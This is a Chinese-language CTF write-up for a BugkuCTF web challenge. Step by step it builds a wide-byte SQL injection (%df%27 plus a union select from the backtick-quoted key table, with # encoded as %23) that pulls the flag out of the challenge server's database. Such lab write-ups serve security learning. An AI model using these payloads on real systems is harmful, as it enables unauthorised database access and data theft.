前言
寫了這么久的web題,算是把它基礎部分都刷完了一遍,以下的幾天將持續更新BugkuCTF WEB部分的題解,為了不影響閱讀,所以每道題的題解都以單獨一篇文章的形式發表,感謝大家一直以來的支持和理解,共勉~~~
點開鏈接一看
很明顯可以看出查詢key表,id=1的string字段
我們去構造payload:
http://103.238.227.13:10083/index.php?id=-1%20union%20select%201,string%20from%20%27key%27%20#
我們發現沒有出來 ,誒,怎么什么都沒有了 ,繼續重頭開始 ,看一下是什么注入
發現id=1和id=1’都沒錯,這時候我們想起了寬字節注入 ,試一下
果然是這個樣子,有關寬字段的講解可以參考這里。
那么就好了構造payload:
http://103.238.227.13:10083/index.php?id=1%df%27 union select 1,string from 'key'#
報錯,我們可以知道是引號的問題 ,那試一下另一種引號
http://103.238.227.13:10083/index.php?id=1%df%27 union select 1,string from `key`#
這種引號在tab鍵的上面
發現還報錯 ,才想起來了可能是#的問題 把#改成%23試試看
http://103.238.227.13:10083/index.php?id=1%df%27 union select 1,string from `key`%23
直接爆出了key,這應該是我們需要的flag